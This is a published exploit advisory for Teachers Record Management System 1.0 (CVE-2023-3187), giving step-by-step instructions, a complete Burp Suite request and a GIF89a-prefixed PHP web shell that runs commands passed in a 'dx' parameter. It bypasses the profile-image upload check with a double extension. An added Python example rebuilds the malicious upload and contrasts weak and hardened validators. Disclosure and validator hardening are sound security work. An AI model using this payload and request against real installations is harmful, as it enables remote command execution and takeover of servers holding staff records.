
Teachers Record Management System 1.0 - File Upload Type Validation

Exploit Title: Teachers Record Management System 1.0 - File Upload Type Validation
Date: 17-01-2023
Exploit Author: affan ahmed
Vendor Homepage: https://phpgurukul.com
Software Link: https://phpgurukul.com/teachers-record-management-system-system-system-php-and-mysql/
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE: CVE-2023-3187
========================================
STEPS_TO_REPRODUCE
========================================
1. Log in to the teacher session with "Username: [email protected]
Password: Test@123"
2. Navigate to the profile section and click Edit Image to edit the profile picture
3. Open Burp Suite and intercept the Edit Image request
4. In the POST request, change the "filename" from "profile pictura.png" to "profile pictura.php.gif"
5. Change the Content-Type of the file part from "image/png" to "image/gif"
6. Replace the file body with this payload: `GIF89a<?php echo system($_REQUEST['dx']);`
7. GIF89a is the GIF file signature (magic bytes); together with the image/gif Content-Type it satisfies the upload's file type check, so the check is bypassed even though the name carries a .php extension. Caveat: the uploaded file only executes as PHP if the web server hands files with .php anywhere in the name to the PHP interpreter (Apache mod_mime AddHandler behaviour); a configuration that only matches a trailing .php will store the file but not run it.
8. Next
====================================================
BURPSUITE_REQUEST
====================================================
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndapya0ggoxsuhdf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/trms/teacher/changeimage.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndapya0ggoxsuhdf
Content-Disposition: form-data; name="subject"

John Doe
------WebKitFormBoundaryndapya0ggoxsuhdf
Content-Disposition: form-data; name="newpic"; filename="profile pictura.php.gif"
Content-Type: image/gif

GIF89a<?php echo system($_REQUEST['dx']);
------WebKitFormBoundaryndapya0ggoxsuhdf
Content-Disposition: form-data; name="submit"

------WebKitFormBoundaryndapya0ggoxsuhdf--
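The upload described in the steps and request above, as an added example that is not part of the original advisory or of the PHPGurukul application: it serialises the same multipart body, then runs the crafted file through two validators written for this page, one modelled on the weak pattern this bug class relies on (an assumption, since the advisory does not quote the application's own check) and a hardened one. The function names, the `ALLOWED` table and the `stored_name` helper are all assumptions for illustration.

```python
# Added example, not code from the advisory or from the TRMS application.
# Builds the multipart body from the intercepted request and contrasts a
# weak upload validator (assumed pattern) with a hardened one.
import secrets

# Boundary and payload copied from the advisory's request (steps 5 and 6).
BOUNDARY = "----WebKitFormBoundaryndapya0ggoxsuhdf"
PAYLOAD = b"GIF89a<?php echo system($_REQUEST['dx']);"  # GIF magic + PHP

# Allowlisted final extensions and the file signatures each must start with.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def build_multipart(fields, file_field, filename, content_type, data,
                    boundary=BOUNDARY):
    """Serialise a multipart/form-data body the way Burp shows it (CRLF ends).
    Plain fields come first, then the single file part."""
    lines = []
    for name, value in fields.items():
        lines += [f"--{boundary}".encode(),
                  f'Content-Disposition: form-data; name="{name}"'.encode(),
                  b"", value.encode()]
    lines += [f"--{boundary}".encode(),
              (f'Content-Disposition: form-data; name="{file_field}"; '
               f'filename="{filename}"').encode(),
              f"Content-Type: {content_type}".encode(),
              b"", data,
              f"--{boundary}--".encode(), b""]
    return b"\r\n".join(lines)


def weak_check(filename, content_type, data):
    """Assumed vulnerable pattern: trust the client's Content-Type, accept an
    image extension anywhere in the name, accept any known image magic."""
    name = filename.lower()
    ext_ok = any(f".{e}" in name for e in ALLOWED)
    magic_ok = any(data.startswith(m) for sigs in ALLOWED.values() for m in sigs)
    return content_type.lower().startswith("image/") and ext_ok and magic_ok


def strict_check(filename, data):
    """Hardened validation; the client-supplied Content-Type is ignored."""
    stem, dot, ext = filename.lower().rpartition(".")
    if not dot or ext not in ALLOWED:
        return False  # no extension, or not on the allowlist
    if "." in stem:
        return False  # "profile pictura.php.gif": reject double extensions
    if not data.startswith(ALLOWED[ext]):
        return False  # signature must match the declared extension
    if b"<?" in data:
        return False  # cheap polyglot filter; re-encoding the image is the real fix
    return True


def stored_name(ext):
    """Never reuse the client's filename on disk: random name, allowlisted ext."""
    return f"{secrets.token_hex(16)}.{ext}"


def demo():
    body = build_multipart({"subject": "John Doe"}, "newpic",
                           "profile pictura.php.gif", "image/gif", PAYLOAD)
    return {
        "body_len": len(body),
        "weak": weak_check("profile pictura.php.gif", "image/gif", PAYLOAD),
        "strict": strict_check("profile pictura.php.gif", PAYLOAD),
        "legit": strict_check("avatar.gif", b"GIF89a" + bytes(10)),
    }


if __name__ == "__main__":
    print(demo())
```

Running it shows the crafted `profile pictura.php.gif` passing `weak_check` and failing `strict_check`, while a plain GIF still passes. The hardened path also discards the client filename entirely via `stored_name`, which removes the double-extension trick regardless of how the web server maps handlers.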
========================================
PROOF_OF_CONCEPT
========================================
GitHub link: https://github.com/ctflearner/vulnerability/blob/main/teacher_record_management_system/trms.md